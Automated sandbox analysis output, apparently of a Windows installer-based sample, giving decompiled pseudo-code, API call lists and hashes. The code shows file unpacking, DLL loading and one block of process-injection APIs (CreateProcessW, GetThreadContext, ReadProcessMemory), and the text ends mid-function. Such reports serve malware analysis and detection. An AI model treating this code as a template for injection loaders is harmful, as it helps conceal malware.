                                                                                • Instruction ID: 94097d04b6c38ee8b1870d6a931f35239ed30ef0cd20ec9d97f11959184772c3
                                                                                • Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                                • Instruction Fuzzy Hash: E4F0A7363442087BDB109F55EC44B9B7B9DDF91750F14C03BF984DA1C0D6B0D9988798
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E6F7116DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                				void _v36;
                                                                                				char _v88;
                                                                                				struct HINSTANCE__* _t37;
                                                                                				intOrPtr _t42;
                                                                                				void* _t48;
                                                                                				void* _t49;
                                                                                				void* _t50;
                                                                                				void* _t54;
                                                                                				intOrPtr _t57;
                                                                                				signed int _t61;
                                                                                				signed int _t63;
                                                                                				void* _t67;
                                                                                				void* _t68;
                                                                                				void* _t72;
                                                                                				void* _t76;
                                                                                
                                                                                				_t76 = __esi;
                                                                                				_t68 = __edi;
                                                                                				_t67 = __edx;
                                                                                				 *0x6f71405c = _a8;
                                                                                				 *0x6f714060 = _a16;
                                                                                				 *0x6f714064 = _a12;
                                                                                				 *((intOrPtr*)(_a20 + 0xc))( *0x6f714038, E6F711556);
                                                                                				_push(1); // executed
                                                                                				_t37 = E6F711A98(); // executed
                                                                                				_t54 = _t37;
                                                                                				if(_t54 == 0) {
                                                                                					L28:
                                                                                					return _t37;
                                                                                				} else {
                                                                                					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                						E6F7122AF(_t54);
                                                                                					}
                                                                                					E6F7122F1(_t67, _t54);
                                                                                					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                                                					if(_t57 == 0xffffffff) {
                                                                                						L14:
                                                                                						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
                                                                                							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                                                								_t37 = E6F7124D8(_t54);
                                                                                							} else {
                                                                                								_push(_t76);
                                                                                								_push(_t68);
                                                                                								_t61 = 8;
                                                                                								_t13 = _t54 + 0x818; // 0x818
                                                                                								memcpy( &_v36, _t13, _t61 << 2);
                                                                                								_t42 = E6F71156B(_t54,  &_v88);
                                                                                								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
                                                                                								_t18 = _t54 + 0x818; // 0x818
                                                                                								_t72 = _t18;
                                                                                								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
                                                                                								 *_t72 = 3;
                                                                                								E6F7124D8(_t54);
                                                                                								_t63 = 8;
                                                                                								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                                                							}
                                                                                						} else {
                                                                                							E6F7124D8(_t54);
                                                                                							_t37 = GlobalFree(E6F711266(E6F711559(_t54)));
                                                                                						}
                                                                                						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                							_t37 = E6F71249E(_t54);
                                                                                							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                                                								_t37 =  *(_t54 + 0x808);
                                                                                								if(_t37 != 0) {
                                                                                									_t37 = FreeLibrary(_t37);
                                                                                								}
                                                                                							}
                                                                                							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
                                                                                								_t37 = E6F7114E2( *0x6f714058);
                                                                                							}
                                                                                						}
                                                                                						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
                                                                                							goto L28;
                                                                                						} else {
                                                                                							return GlobalFree(_t54);
                                                                                						}
                                                                                					}
                                                                                					_t48 =  *_t54;
                                                                                					if(_t48 == 0) {
                                                                                						if(_t57 != 1) {
                                                                                							goto L14;
                                                                                						}
                                                                                						E6F712CC3(_t54);
                                                                                						L12:
                                                                                						_t54 = _t48;
                                                                                						L13:
                                                                                						goto L14;
                                                                                					}
                                                                                					_t49 = _t48 - 1;
                                                                                					if(_t49 == 0) {
                                                                                						L8:
                                                                                						_t48 = E6F712A38(_t57, _t54); // executed
                                                                                						goto L12;
                                                                                					}
                                                                                					_t50 = _t49 - 1;
                                                                                					if(_t50 == 0) {
                                                                                						E6F7126B2(_t54);
                                                                                						goto L13;
                                                                                					}
                                                                                					if(_t50 != 1) {
                                                                                						goto L14;
                                                                                					}
                                                                                					goto L8;
                                                                                				}
                                                                                			}



















                                                                                APIs
                                                                                  • Part of subcall function 6F711A98: GlobalFree.KERNEL32 ref: 6F711D09
                                                                                  • Part of subcall function 6F711A98: GlobalFree.KERNEL32 ref: 6F711D0E
                                                                                  • Part of subcall function 6F711A98: GlobalFree.KERNEL32 ref: 6F711D13
                                                                                • GlobalFree.KERNEL32 ref: 6F711786
                                                                                • FreeLibrary.KERNEL32(?), ref: 6F711809
                                                                                • GlobalFree.KERNEL32 ref: 6F71182E
                                                                                  • Part of subcall function 6F7122AF: GlobalAlloc.KERNEL32(00000040,?), ref: 6F7122E0
                                                                                  • Part of subcall function 6F7126B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F711757,00000000), ref: 6F712782
                                                                                  • Part of subcall function 6F71156B: wsprintfA.USER32 ref: 6F711599
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644261390.000000006F711000.00000020.00020000.sdmp, Offset: 6F710000, based on PE: true
                                                                                • Associated: 00000000.00000002.644238585.000000006F710000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644270262.000000006F713000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644290951.000000006F715000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                • String ID:
                                                                                • API String ID: 3962662361-3916222277
                                                                                • Opcode ID: 6b4941a869b4d38db6d1e9cddd4af3d59fd2642953384c2e61b36525dc000efe
                                                                                • Instruction ID: 0570e648a778ce666b218fc19b9419c4069cae4c560631ea742bf176ab0f76b9
                                                                                • Opcode Fuzzy Hash: 6b4941a869b4d38db6d1e9cddd4af3d59fd2642953384c2e61b36525dc000efe
                                                                                • Instruction Fuzzy Hash: 21415E711083089BDB00DF649B89B9537ECBF2A328F0C8576E9159E182DBB4E55DC7B1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E004032BF(intOrPtr _a4) {
                                                                                				intOrPtr _t11;
                                                                                				signed int _t12;
                                                                                				void* _t15;
                                                                                				long _t16;
                                                                                				void* _t18;
                                                                                				intOrPtr _t30;
                                                                                				intOrPtr _t33;
                                                                                				intOrPtr _t35;
                                                                                				void* _t36;
                                                                                				intOrPtr _t48;
                                                                                
                                                                                				_t33 =  *0x429464 -  *0x40b898 + _a4;
                                                                                				 *0x42f450 = GetTickCount() + 0x1f4;
                                                                                				if(_t33 <= 0) {
                                                                                					L22:
                                                                                					E00402E52(1);
                                                                                					return 0;
                                                                                				}
                                                                                				E0040343E( *0x429474);
                                                                                				SetFilePointer( *0x40a01c,  *0x40b898, 0, 0); // executed
                                                                                				 *0x429470 = _t33;
                                                                                				 *0x429460 = 0;
                                                                                				while(1) {
                                                                                					_t30 = 0x4000;
                                                                                					_t11 =  *0x429468 -  *0x429474;
                                                                                					if(_t11 <= 0x4000) {
                                                                                						_t30 = _t11;
                                                                                					}
                                                                                					_t12 = E00403428(0x41d460, _t30);
                                                                                					if(_t12 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					 *0x429474 =  *0x429474 + _t30;
                                                                                					 *0x40b8a0 = 0x41d460;
                                                                                					 *0x40b8a4 = _t30;
                                                                                					L6:
                                                                                					if( *0x42f454 != 0 &&  *0x42f500 == 0) {
                                                                                						 *0x429460 =  *0x429470 -  *0x429464 - _a4 +  *0x40b898;
                                                                                						E00402E52(0);
                                                                                					}
                                                                                					 *0x40b8a8 = 0x415460;
                                                                                					 *0x40b8ac = 0x8000;
                                                                                					if(E0040677B(0x40b8a0) < 0) {
                                                                                						goto L20;
                                                                                					}
                                                                                					_t35 =  *0x40b8a8; // 0x4188c7
                                                                                					_t36 = _t35 - 0x415460;
                                                                                					if(_t36 == 0) {
                                                                                						__eflags =  *0x40b8a4; // 0x0
                                                                                						if(__eflags != 0) {
                                                                                							goto L20;
                                                                                						}
                                                                                						__eflags = _t30;
                                                                                						if(_t30 == 0) {
                                                                                							goto L20;
                                                                                						}
                                                                                						L16:
                                                                                						_t16 =  *0x429464;
                                                                                						if(_t16 -  *0x40b898 + _a4 > 0) {
                                                                                							continue;
                                                                                						}
                                                                                						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                                                						goto L22;
                                                                                					}
                                                                                					_t18 = E00405E8D( *0x40a01c, 0x415460, _t36); // executed
                                                                                					if(_t18 == 0) {
                                                                                						_push(0xfffffffe);
                                                                                						L21:
                                                                                						_pop(_t15);
                                                                                						return _t15;
                                                                                					}
                                                                                					 *0x40b898 =  *0x40b898 + _t36;
                                                                                					_t48 =  *0x40b8a4; // 0x0
                                                                                					if(_t48 != 0) {
                                                                                						goto L6;
                                                                                					}
                                                                                					goto L16;
                                                                                					L20:
                                                                                					_push(0xfffffffd);
                                                                                					goto L21;
                                                                                				}
                                                                                				return _t12 | 0xffffffff;
                                                                                			}














                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 004032D3
                                                                                  • Part of subcall function 0040343E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 00403306
                                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,0040B8A0,0041D460,00004000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF), ref: 00403401
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FilePointer$CountTick
                                                                                • String ID: `TA
                                                                                • API String ID: 1092082344-1754987364
                                                                                • Opcode ID: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
                                                                                • Instruction ID: bb82d22d1a80a93a7495f99719332701a8bc5653d470bc60fdd2df8261a6fa09
                                                                                • Opcode Fuzzy Hash: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
                                                                                • Instruction Fuzzy Hash: 3A31B3726042159FDB10BF29EE849263BACFB40359B88813BE405B62F1C7785C428A9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 6EEE3369
                                                                                • GetThreadContext.KERNELBASE(?,00010007), ref: 6EEE338C
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 6EEE33B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644186956.000000006EEE3000.00000040.00020000.sdmp, Offset: 6EEE0000, based on PE: true
                                                                                • Associated: 00000000.00000002.644129589.000000006EEE0000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644157709.000000006EEE1000.00000080.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644176627.000000006EEE2000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644212634.000000006EEE8000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThread
                                                                                • String ID:
                                                                                • API String ID: 2411489757-0
                                                                                • Opcode ID: e0b41718201e984db639e1a29ac16d34ca8b5eb045ec74d54a4aaa76aa81e2d6
                                                                                • Instruction ID: 4730253e625433dd33aa017c7e79d573b6cdc6df15d589099ad605ab1be9d3e9
                                                                                • Opcode Fuzzy Hash: e0b41718201e984db639e1a29ac16d34ca8b5eb045ec74d54a4aaa76aa81e2d6
                                                                                • Instruction Fuzzy Hash: 46320631E50209EEEB50CFE4DC59BEDB7B5AF04705F20449AE618FA6A0E7709A84CF15
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 60%
                                                                                			E0040209D(void* __ebx, void* __eflags) {
                                                                                				struct HINSTANCE__* _t18;
                                                                                				struct HINSTANCE__* _t26;
                                                                                				void* _t27;
                                                                                				struct HINSTANCE__* _t30;
                                                                                				CHAR* _t32;
                                                                                				intOrPtr* _t33;
                                                                                				void* _t34;
                                                                                
                                                                                				_t27 = __ebx;
                                                                                				asm("sbb eax, 0x42f518");
                                                                                				 *(_t34 - 4) = 1;
                                                                                				if(__eflags < 0) {
                                                                                					_push(0xffffffe7);
                                                                                					L15:
                                                                                					E00401423();
                                                                                					L16:
                                                                                					 *0x42f4e8 =  *0x42f4e8 +  *(_t34 - 4);
                                                                                					return 0;
                                                                                				}
                                                                                				_t32 = E00402BCE(0xfffffff0);
                                                                                				 *(_t34 + 8) = E00402BCE(1);
                                                                                				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                                                					L3:
                                                                                					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                                                					_t30 = _t18;
                                                                                					if(_t30 == _t27) {
                                                                                						_push(0xfffffff6);
                                                                                						goto L15;
                                                                                					}
                                                                                					L4:
                                                                                					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                                                					if(_t33 == _t27) {
                                                                                						E00405374(0xfffffff7,  *(_t34 + 8));
                                                                                					} else {
                                                                                						 *(_t34 - 4) = _t27;
                                                                                						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                                                							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b890, 0x40a000); // executed
                                                                                						} else {
                                                                                							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                                                							if( *_t33() != 0) {
                                                                                								 *(_t34 - 4) = 1;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403A00(_t30) != 0) {
                                                                                						FreeLibrary(_t30);
                                                                                					}
                                                                                					goto L16;
                                                                                				}
                                                                                				_t26 = GetModuleHandleA(_t32); // executed
                                                                                				_t30 = _t26;
                                                                                				if(_t30 != __ebx) {
                                                                                					goto L4;
                                                                                				}
                                                                                				goto L3;
                                                                                			}











                                                                                APIs
                                                                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                                  • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                  • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                  • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                  • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                  • Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                  • Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                  • Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                • String ID:
                                                                                • API String ID: 2987980305-0
                                                                                • Opcode ID: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
                                                                                • Instruction ID: e3fe6dffd4d776efa863efd9403cf6e1974d247a329121c392e1043855ccd094
                                                                                • Opcode Fuzzy Hash: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
                                                                                • Instruction Fuzzy Hash: 2721EE32A00115EBCF20BF648F49B9F76B1AF14359F20423BF651B61D1CBBC49829A5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 87%
                                                                                			E004015BB(char __ebx, void* __eflags) {
                                                                                				void* _t13;
                                                                                				int _t19;
                                                                                				char _t21;
                                                                                				void* _t22;
                                                                                				char _t23;
                                                                                				signed char _t24;
                                                                                				char _t26;
                                                                                				CHAR* _t28;
                                                                                				char* _t32;
                                                                                				void* _t33;
                                                                                
                                                                                				_t26 = __ebx;
                                                                                				_t28 = E00402BCE(0xfffffff0);
                                                                                				_t13 = E00405C7E(_t28);
                                                                                				_t30 = _t13;
                                                                                				if(_t13 != __ebx) {
                                                                                					do {
                                                                                						_t32 = E00405C10(_t30, 0x5c);
                                                                                						_t21 =  *_t32;
                                                                                						 *_t32 = _t26;
                                                                                						 *((char*)(_t33 + 0xb)) = _t21;
                                                                                						if(_t21 != _t26) {
                                                                                							L5:
                                                                                							_t22 = E004058B7(_t28);
                                                                                						} else {
                                                                                							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                                                							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D4(_t39) == 0) {
                                                                                								goto L5;
                                                                                							} else {
                                                                                								_t22 = E0040583A(_t28); // executed
                                                                                							}
                                                                                						}
                                                                                						if(_t22 != _t26) {
                                                                                							if(_t22 != 0xb7) {
                                                                                								L9:
                                                                                								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                							} else {
                                                                                								_t24 = GetFileAttributesA(_t28); // executed
                                                                                								if((_t24 & 0x00000010) == 0) {
                                                                                									goto L9;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                                                						 *_t32 = _t23;
                                                                                						_t30 = _t32 + 1;
                                                                                					} while (_t23 != _t26);
                                                                                				}
                                                                                				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                                                					_push(0xfffffff5);
                                                                                					E00401423();
                                                                                				} else {
                                                                                					E00401423(0xffffffe6);
                                                                                					E0040624D("C:\\Users\\jones\\AppData\\Local\\Temp", _t28);
                                                                                					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                                                					if(_t19 == 0) {
                                                                                						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                					}
                                                                                				}
                                                                                				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t33 - 4));
                                                                                				return 0;
                                                                                			}














                                                                                APIs
                                                                                  • Part of subcall function 00405C7E: CharNextA.USER32(?,?,0042BCC0,?,00405CEA,0042BCC0,0042BCC0,73BCFA90,?,73BCF560,00405A35,?,73BCFA90,73BCF560,00000000), ref: 00405C8C
                                                                                  • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405C91
                                                                                  • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405CA5
                                                                                • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                  • Part of subcall function 0040583A: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
                                                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                                • API String ID: 1892508949-47812868
                                                                                • Opcode ID: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
                                                                                • Instruction ID: 4524d263cfc656ab508a586836abab8f1c5f66e1bf0f475862462bf062351d6a
                                                                                • Opcode Fuzzy Hash: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
                                                                                • Instruction Fuzzy Hash: C7110832108141EBDB307FA54D409BF37B49A92314B28457FE591B22E3D63C4942962E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E004031B7(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                                				long _v8;
                                                                                				long _t21;
                                                                                				long _t22;
                                                                                				void* _t24;
                                                                                				long _t26;
                                                                                				int _t27;
                                                                                				long _t28;
                                                                                				void* _t29;
                                                                                				void* _t30;
                                                                                				long _t31;
                                                                                				long _t32;
                                                                                				long _t36;
                                                                                
                                                                                				_t21 = _a4;
                                                                                				if(_t21 >= 0) {
                                                                                					_t32 = _t21 +  *0x42f4b8;
                                                                                					 *0x429464 = _t32;
                                                                                					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                                                				}
                                                                                				_t22 = E004032BF(4);
                                                                                				if(_t22 >= 0) {
                                                                                					_t24 = E00405E5E( *0x40a01c,  &_a4, 4); // executed
                                                                                					if(_t24 == 0) {
                                                                                						L18:
                                                                                						_push(0xfffffffd);
                                                                                						goto L19;
                                                                                					} else {
                                                                                						 *0x429464 =  *0x429464 + 4;
                                                                                						_t36 = E004032BF(_a4);
                                                                                						if(_t36 < 0) {
                                                                                							L21:
                                                                                							_t22 = _t36;
                                                                                						} else {
                                                                                							if(_a12 != 0) {
                                                                                								_t26 = _a4;
                                                                                								if(_t26 >= _a16) {
                                                                                									_t26 = _a16;
                                                                                								}
                                                                                								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                                                								if(_t27 != 0) {
                                                                                									_t36 = _v8;
                                                                                									 *0x429464 =  *0x429464 + _t36;
                                                                                									goto L21;
                                                                                								} else {
                                                                                									goto L18;
                                                                                								}
                                                                                							} else {
                                                                                								if(_a4 <= 0) {
                                                                                									goto L21;
                                                                                								} else {
                                                                                									while(1) {
                                                                                										_t28 = _a4;
                                                                                										if(_a4 >= 0x4000) {
                                                                                											_t28 = 0x4000;
                                                                                										}
                                                                                										_v8 = _t28;
                                                                                										_t29 = E00405E5E( *0x40a01c, 0x41d460, _t28); // executed
                                                                                										if(_t29 == 0) {
                                                                                											goto L18;
                                                                                										}
                                                                                										_t30 = E00405E8D(_a8, 0x41d460, _v8); // executed
                                                                                										if(_t30 == 0) {
                                                                                											_push(0xfffffffe);
                                                                                											L19:
                                                                                											_pop(_t22);
                                                                                										} else {
                                                                                											_t31 = _v8;
                                                                                											_a4 = _a4 - _t31;
                                                                                											 *0x429464 =  *0x429464 + _t31;
                                                                                											_t36 = _t36 + _t31;
                                                                                											if(_a4 > 0) {
                                                                                												continue;
                                                                                											} else {
                                                                                												goto L21;
                                                                                											}
                                                                                										}
                                                                                										goto L22;
                                                                                									}
                                                                                									goto L18;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				L22:
                                                                                				return _t22;
                                                                                			}
















                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 004031DC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FilePointer
                                                                                • String ID:
                                                                                • API String ID: 973152223-0
                                                                                • Opcode ID: c5bf3f2a7834a57ab6379b74590a1aae870d7d7a6e9b7999044e5077526538b5
                                                                                • Instruction ID: f7a06b24e1bdd84e59f3f5cc49a67b6726d22d07d12c3136825aaea33ef0281b
                                                                                • Opcode Fuzzy Hash: c5bf3f2a7834a57ab6379b74590a1aae870d7d7a6e9b7999044e5077526538b5
                                                                                • Instruction Fuzzy Hash: 91318D70200218EFDB109F95DD44A9A3BACEB04759F1044BEF905E61A0D3389E51DBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 59%
                                                                                			E00401389(signed int _a4) {
                                                                                				intOrPtr* _t6;
                                                                                				void* _t8;
                                                                                				void* _t10;
                                                                                				signed int _t11;
                                                                                				void* _t12;
                                                                                				signed int _t16;
                                                                                				signed int _t17;
                                                                                				void* _t18;
                                                                                
                                                                                				_t17 = _a4;
                                                                                				while(_t17 >= 0) {
                                                                                					_t6 = _t17 * 0x1c +  *0x42f490;
                                                                                					if( *_t6 == 1) {
                                                                                						break;
                                                                                					}
                                                                                					_push(_t6); // executed
                                                                                					_t8 = E00401434(); // executed
                                                                                					if(_t8 == 0x7fffffff) {
                                                                                						return 0x7fffffff;
                                                                                					}
                                                                                					_t10 = E0040136D(_t8);
                                                                                					if(_t10 != 0) {
                                                                                						_t11 = _t10 - 1;
                                                                                						_t16 = _t17;
                                                                                						_t17 = _t11;
                                                                                						_t12 = _t11 - _t16;
                                                                                					} else {
                                                                                						_t12 = _t10 + 1;
                                                                                						_t17 = _t17 + 1;
                                                                                					}
                                                                                					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                						 *0x42ec2c =  *0x42ec2c + _t12;
                                                                                						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec2c, 0x7530,  *0x42ec14), 0);
                                                                                					}
                                                                                				}
                                                                                				return 0;
                                                                                			}












                                                                                APIs
                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                                                • Instruction ID: 4ffa91c62993149d5f3561e9fd219417dede2ec5d116c30815b8555db40bf4f7
                                                                                • Opcode Fuzzy Hash: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                                                • Instruction Fuzzy Hash: 480121317242109BE7184B7A8D04B6A32A8E710318F10853AF841F61F1DA789C028B4C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00406656(signed int _a4) {
                                                                                				struct HINSTANCE__* _t5;
                                                                                				signed int _t10;
                                                                                
                                                                                				_t10 = _a4 << 3;
                                                                                				_t8 =  *(_t10 + 0x40a258);
                                                                                				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
                                                                                				if(_t5 != 0) {
                                                                                					L2:
                                                                                					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
                                                                                				}
                                                                                				_t5 = E004065E8(_t8); // executed
